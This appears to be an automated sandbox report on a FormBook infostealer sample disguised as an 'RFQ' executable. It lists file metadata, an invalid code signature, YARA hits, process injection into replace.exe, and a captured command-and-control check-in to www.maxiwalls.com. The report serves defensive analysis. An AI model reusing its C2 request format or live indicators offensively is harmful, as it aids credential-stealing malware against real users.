                                                                                    Overall analysis duration:0h 8m 46s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Number of analysed new started processes analysed:10
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:2
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:RFQ 0400-ENPI-RQMA.exe
                                                                                    Detection:MAL
                                                                                    Classification:mal100.troj.spyw.evad.winEXE@7/2@1/1
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 75%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 84%
                                                                                    • Number of executed functions: 121
                                                                                    • Number of non-executed functions: 259
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .exe
                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                    • Not all processes were analyzed, report is missing behavior information
                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                    • VT rate limit hit for: RFQ 0400-ENPI-RQMA.exe
                                                                                    Time      Type             Description
                                                                                    14:22:53  API Interceptor  1x Sleep call for process: RFQ 0400-ENPI-RQMA.exe modified
                                                                                    Process:C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):1415
                                                                                    Entropy (8bit):5.352427679901606
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRuAE4KzecKIE4oKNzKorE4x84j:MIHK5HKH1qHiYHKh3oPHKMRuAHKzectP
                                                                                    MD5:3978978DE913FD1C068312697D6E5917
                                                                                    SHA1:1DABBE7FB8F38F6EBF474CE5F0ECAA89F48E2538
                                                                                    SHA-256:33B7B1668DDD3AB39711F9F93B667F6F2F674348A79228BFA163BA625B37F120
                                                                                    SHA-512:78694B97F5D03758F503155E5CE5B85AABDF9690F0DFBC51FCE9926BE2D86BCF99E008659420F1E8489A7F6EA125F2776D4C6DC4B151566B529454512352953D
                                                                                    Malicious:false
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll"
                                                                                    Process:C:\Windows\SysWOW64\replace.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                    Category:dropped
                                                                                    Size (bytes):114688
                                                                                    Entropy (8bit):0.9746603542602881
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                    Malicious:false
                                                                                    Reputation:high, very likely benign file
                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Entropy (8bit):7.9566192932571385
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:RFQ 0400-ENPI-RQMA.exe
                                                                                    File size:723'464 bytes
                                                                                    MD5:73b6e5a11aff9e7bd681b55136c5fbcf
                                                                                    SHA1:d8113fa2bd2b2fa43f3920b93f9a5217b9cb69a2
                                                                                    SHA256:3ca71ea7d01b1f1e3613781fcd68b47c09a159af5876c134065bef4d912917a6
                                                                                    SHA512:6450875cf74a6992dac1b880f510a2b46c04978b808e94c2162ee2b1cf8d89686d1f9b59d2c4b8e55e217435e70b405e73d8645a4c75f616d80cbb932d2a93c0
                                                                                    SSDEEP:12288:ijF9WMP0l64aOQ3p2K2pp4o1aCoaCoDVAcN2jWN9uq+V9mYxfY5fkR:ij2MPwc52h5YCXXjN2yD/+V9XNa6
                                                                                    TLSH:A7F42350B2E45F12FABB9BB522968A219730B8CB5431DBDCDDD121CE51A1F01D6A2F0F
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B.................0.............F.... ........@.. ....................... ............@................................
                                                                                    Icon Hash:526c6a52d0e4f047
                                                                                    Entrypoint:0x4ad246
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:true
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0xECE1BD42 [Thu Dec 8 21:10:26 2095 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                    Signature Valid:false
                                                                                    Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                    Error Number:-2146869232
                                                                                    Not Before, Not After
                                                                                    • 13/11/2018 00:00:00, 08/11/2021 23:59:59
                                                                                    Subject Chain
                                                                                    • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                                    Version:3
                                                                                    Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                    Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                    Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                    Serial:7C1118CBBADC95DA3752C46E47A27438
                                                                                    Instruction
                                                                                    jmp dword ptr [00402000h]
                                                                                    xor al, 47h
                                                                                    inc ecx
                                                                                    inc edi
                                                                                    dec eax
                                                                                    inc ebp
                                                                                    xor eax, 484E3531h
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [edx], dh
                                                                                    push esp
                                                                                    xor eax, 43433753h
                                                                                    xor al, 52h
                                                                                    cmp byte ptr [00000000h], dh
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xad1f3 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xae000 | 0x1b80 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xad400 | 0x3608 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb0000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xab93c | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xab26c | 0xab400 | 080ed6a441b548d49a36bd1dee2effc1 | False | 0.9654539233576642 | data | 7.96453329112393 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xae000 | 0x1b80 | 0x1c00 | b55871f696da632f0c30d95397a648f4 | False | 0.34988839285714285 | data | 5.579515054448806 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xb0000 | 0xc | 0x200 | 41336c745dd5e354f194e3be7ccdfbd5 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xae160 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | | | 0.2675891181988743
RT_ICON | 0xaf208 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | | | 0.5106382978723404
RT_GROUP_ICON | 0xaf670 | 0x22 | data | | | 0.9411764705882353
RT_VERSION | 0xaf694 | 0x300 | MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4" | | | 0.4609375
RT_MANIFEST | 0xaf994 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
04/23/24-14:23:35.363733 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49743 | 80 | 192.168.2.4 | 79.98.25.1
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 23, 2024 14:23:35.133434057 CEST | 49743 | 80 | 192.168.2.4 | 79.98.25.1
Apr 23, 2024 14:23:35.360712051 CEST | 80 | 49743 | 79.98.25.1 | 192.168.2.4
Apr 23, 2024 14:23:35.360879898 CEST | 49743 | 80 | 192.168.2.4 | 79.98.25.1
Apr 23, 2024 14:23:35.363733053 CEST | 49743 | 80 | 192.168.2.4 | 79.98.25.1
Apr 23, 2024 14:23:35.590857029 CEST | 80 | 49743 | 79.98.25.1 | 192.168.2.4
Apr 23, 2024 14:23:35.592740059 CEST | 80 | 49743 | 79.98.25.1 | 192.168.2.4
Apr 23, 2024 14:23:35.592761040 CEST | 80 | 49743 | 79.98.25.1 | 192.168.2.4
Apr 23, 2024 14:23:35.592780113 CEST | 80 | 49743 | 79.98.25.1 | 192.168.2.4
Apr 23, 2024 14:23:35.592797995 CEST | 80 | 49743 | 79.98.25.1 | 192.168.2.4
Apr 23, 2024 14:23:35.592814922 CEST | 80 | 49743 | 79.98.25.1 | 192.168.2.4
Apr 23, 2024 14:23:35.592840910 CEST | 80 | 49743 | 79.98.25.1 | 192.168.2.4
Apr 23, 2024 14:23:35.592861891 CEST | 49743 | 80 | 192.168.2.4 | 79.98.25.1
Apr 23, 2024 14:23:35.592941999 CEST | 49743 | 80 | 192.168.2.4 | 79.98.25.1
Apr 23, 2024 14:23:35.592966080 CEST | 49743 | 80 | 192.168.2.4 | 79.98.25.1
Apr 23, 2024 14:23:35.596626043 CEST | 49743 | 80 | 192.168.2.4 | 79.98.25.1
Apr 23, 2024 14:23:35.823740959 CEST | 80 | 49743 | 79.98.25.1 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 23, 2024 14:23:34.550977945 CEST | 59465 | 53 | 192.168.2.4 | 1.1.1.1
Apr 23, 2024 14:23:35.118628979 CEST | 53 | 59465 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 23, 2024 14:23:34.550977945 CEST | 192.168.2.4 | 1.1.1.1 | 0x5dc3 | Standard query (0) | www.maxiwalls.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 23, 2024 14:23:35.118628979 CEST | 1.1.1.1 | 192.168.2.4 | 0x5dc3 | No error (0) | www.maxiwalls.com | | 79.98.25.1 | A (IP address) | IN (0x0001) | false
                                                                                    • www.maxiwalls.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49743 | 79.98.25.1 | 80 | 4048 | C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 23, 2024 14:23:35.363733053 CEST | 468 | OUT | GET /aleu/?lT2ltVXh=ok/gmcxpcerYYESV9LVelGsDrZokr4IbVWXcVokfXup7b9fdD39fjj06OXsQXJEXHKhiFziBALjD8i0StjfBb+96LAD/3UXNvlvrkMKLP/jNG9hi36bWzAk=&66=uX3d2 HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Host: www.maxiwalls.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Apr 23, 2024 14:23:35.592740059 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                    Date: Tue, 23 Apr 2024 12:23:35 GMT
                                                                                    Server: Apache
                                                                                    Cache-control: max-age=300
                                                                                    Vary: Accept-Encoding
                                                                                    Content-Length: 5662
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Data Ascii: <!doctype html><html> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="robots" content="noindex, nofollow"> <meta name="viewport" content="width=800, maximum-scale=1"> <meta name="theme-color" content="#005ca3"> <meta itemprop="image" content="https://assets.iv.lt/images/thumbnail.png"> <meta property="og:image" content="https://assets.iv.lt/images/thumbnail.png"> <link rel="icon" sizes="96x96" href="https://assets.iv.lt/images/icon.png"> <link rel="apple-touch-icon" href="https://assets.iv.lt/images/icon.png"> <link rel="stylesheet" type="text/css" href="https://assets.iv.lt/default.css"> <title>maxiwalls.com - Uregistruotas domenas - Interneto vizija</title> </head> <body>... begin header --> <table align=center cellpadding=0 cellspacing=0> <tr> <td> <iframe src="https://assets.iv.lt/header.html" width=768 height=100 scrolling=no frameborder=0></iframe> </td> </tr> <tr><td height=24></td></tr> </table>... end header -->... begin body -->
Apr 23, 2024 14:23:35.592761040 CEST | 1289 | IN |
                                                                                    Data Ascii: <table width=768 align=center cellpadding=0 cellspacing=0> <tr> <td> <h1>maxiwalls.com</h1> <p> </td> </tr> <tr valign=top> <td width=508> Domenas <b>maxiwalls.com</b> skmingai uregistruotas
Apr 23, 2024 14:23:35.592780113 CEST | 1289 | IN |
                                                                                    Data Ascii: m, kad iandien pas mus savo interneto svetaines talpina ir mumis pasitiki daugiausiai alies gyventoj. <p> <table class=table> <tr> <th></th> <th>Patui</th> <th>Svetainei</th> <th>U
Apr 23, 2024 14:23:35.592797995 CEST | 1289 | IN |
                                                                                    Data Ascii: <td>+</td> <td>+</td> </tr> <tr align=center> <td align=left>Reseller</td> <td>-</td> <td>-</td> <td>-</td> <td>+</td> </tr> <tr align=center> <td align=left
Apr 23, 2024 14:23:35.592814922 CEST | 710 | IN |
                                                                                    Data Ascii: li><a target=_top href="https://www.iv.lt/profesionalus-hostingas/">Profesionalus hostingas</a> <li><a target=_top href="https://www.iv.lt/vps-serveriai/">Serveri nuoma</a> <li><a target=_top href="https://www.iv.lt/sertifikata



                                                                                    Target ID:0
                                                                                    Start time:14:22:52
                                                                                    Start date:23/04/2024
                                                                                    Path:C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe"
                                                                                    Imagebase:0xec0000
                                                                                    File size:723'464 bytes
                                                                                    MD5 hash:73B6E5A11AFF9E7BD681B55136C5FBCF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:2
                                                                                    Start time:14:22:54
                                                                                    Start date:23/04/2024
                                                                                    Path:C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe"
                                                                                    Imagebase:0x990000
                                                                                    File size:723'464 bytes
                                                                                    MD5 hash:73B6E5A11AFF9E7BD681B55136C5FBCF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1927201157.0000000001300000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1927201157.0000000001300000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1926547005.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1926547005.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1928973003.00000000017E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1928973003.00000000017E0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:4
                                                                                    Start time:14:23:14
                                                                                    Start date:23/04/2024
                                                                                    Path:C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe"
                                                                                    Imagebase:0x9b0000
                                                                                    File size:140'800 bytes
                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2896021580.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2896021580.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Target ID:5
                                                                                    Start time:14:23:15
                                                                                    Start date:23/04/2024
                                                                                    Path:C:\Windows\SysWOW64\replace.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\SysWOW64\replace.exe"
                                                                                    Imagebase:0x3b0000
                                                                                    File size:18'944 bytes
                                                                                    MD5 hash:A7F2E9DD9DE1396B1250F413DA2F6C08
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2175893456.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2175893456.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2175933717.0000000003020000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2175933717.0000000003020000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:8
                                                                                    Start time:14:23:28
                                                                                    Start date:23/04/2024
                                                                                    Path:C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe"
                                                                                    Imagebase:0x9b0000
                                                                                    File size:140'800 bytes
                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2913084591.0000000004B50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2913084591.0000000004B50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Target ID:9
                                                                                    Start time:14:23:40
                                                                                    Start date:23/04/2024
                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                    Imagebase:
                                                                                    File size:676'768 bytes
                                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false


                                                                                      Execution Graph

                                                                                      Execution Coverage:8.3%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:214
                                                                                      Total number of Limit Nodes:23

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Te^q$Te^q$)"
                                                                                      • API String ID: 0-4031938444
                                                                                      • Opcode ID: 81fd3442bbe70f3ac801fdc1f451c207cfbeafc747a39704ece34247387bf620
                                                                                      • Instruction ID: d69a730a7ec80e6eac01b78b4cc6e814d054279c921a7ee03a2f9c5f92ffd275
                                                                                      • Opcode Fuzzy Hash: 81fd3442bbe70f3ac801fdc1f451c207cfbeafc747a39704ece34247387bf620
                                                                                      • Instruction Fuzzy Hash: 9A81E5B4E012199FDB08CFAAC9846DEFBB2FF89300F24942AD419AB358D7355946CF54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Te^q$Te^q$)"
                                                                                      • API String ID: 0-4031938444
                                                                                      • Opcode ID: 91df6c1801205c58adeea326c9dacba89f8d95ab81dc3619d370e63adc07f690
                                                                                      • Instruction ID: aa421d8ed47e1ddf7e12660b2a265ae4385933907eb51f74b6f109ac39d53327
                                                                                      • Opcode Fuzzy Hash: 91df6c1801205c58adeea326c9dacba89f8d95ab81dc3619d370e63adc07f690
                                                                                      • Instruction Fuzzy Hash: 4181E774E012199FDB08CFAAC9846DEFBB2FF89310F24842AD419AB358D7355946CF54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tIh
                                                                                      • API String ID: 0-443931868
                                                                                      • Opcode ID: 9881b9f0ebf4f2902262d60e0107e555f19eb79a3e576dcf833ab89fefdd9dde
                                                                                      • Instruction ID: fd787d486d429e3eb72982240fdfcb4a3ea4ad6a6dcb039f3fcdb539715e8032
                                                                                      • Opcode Fuzzy Hash: 9881b9f0ebf4f2902262d60e0107e555f19eb79a3e576dcf833ab89fefdd9dde
                                                                                      • Instruction Fuzzy Hash: CCF1BDB0D1529AEFDB04CFA9D4848EEFBB2FF49304B10A09AD015AB615C7359983CF95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tIh
                                                                                      • API String ID: 0-443931868
                                                                                      • Opcode ID: b827f16eb439fed3f6ea4ca4bf117de82cc6c8178b580ffe8d1b79eb5ae5bb42
                                                                                      • Instruction ID: 3981a3a4244618f66af0b25c3a52e564547043700290f5492cfcb6362029219f
                                                                                      • Opcode Fuzzy Hash: b827f16eb439fed3f6ea4ca4bf117de82cc6c8178b580ffe8d1b79eb5ae5bb42
                                                                                      • Instruction Fuzzy Hash: EFD169B0E1125ADFDB04CF99D4848AEFBB2FF89301B10D595E419AB614D734AA83CF94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2ef4494be4f8fb130d99b156d2c39bbda818e8a5ae0f5d0a1d0ae9d9c853b16d
